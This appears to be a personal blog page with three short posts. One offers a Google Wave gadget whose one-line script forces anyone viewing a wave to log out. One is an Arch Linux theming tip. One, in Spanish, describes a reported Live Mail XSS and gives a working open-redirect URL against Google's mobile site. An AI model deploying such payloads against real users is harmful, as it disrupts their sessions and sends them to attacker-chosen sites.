Google Wave – Make your friends logout gadget

Posted on November 20, 2009 by Fernando

Adding this gadget to any wave will make people log out when they see it:

http://beford.org/stuff/waveg.xml

The code:

<script type="text/javascript">
top.location="https://wave.google.com/wave/logout";
</script>

Posted in Uncategorized | Tagged , , , , , | 3 Comments

Fix Firefox look on KDE4

Posted on November 20, 2009 by Fernando

To fix the look of Shiretoko on Archlinux do:

pacman -Syy
pacman -S pacman -S qtcurve-gtk2

Go to Applications -> Settings -> GTK Styles and Fonts

Select 'Use another style' and choose 'QtCurve' and you are done.

Before

snapshot2

After

snapshot3

Posted in Uncategorized | Tagged , , | Leave a comment

Cosas que pasan

Posted on November 2, 2008 by Fernando

El mmg de Hades publico esto antes que yo, un XSS en live mail, estaba almacenado en /stuff hace tiempo ya, es un simple poc, que muestra los contactos.  Fue reportado a Microsoft hace casi 1 mes, recibi un correo diciendo que ya habrian creado un reporte interno, donde se encargarian del asunto.

POC: http://beford.org/stuff/live.htm

Y otra cosa interesante que encontre, es algo en la interface movil de google, en la seccion para configurar el idioma, el parametro continue, recibe la ruta donde se encontraba el usuario, para poder retornarlo alli una vez seleccione el idioma. Aparentemente no estan haciendo una concatenacion de 'm.google.com/' + continue sino de 'm.google.com' + continue. Pasandole a continue un valor de '.otrodominio.com' hariamos que todos los enlaces apunten a un sitio externo fuera de google.

POC: http://m.google.com/languages/?dc=gorganic&continue=.beford.org

Posted in Español, Security, XSS | 7 Comments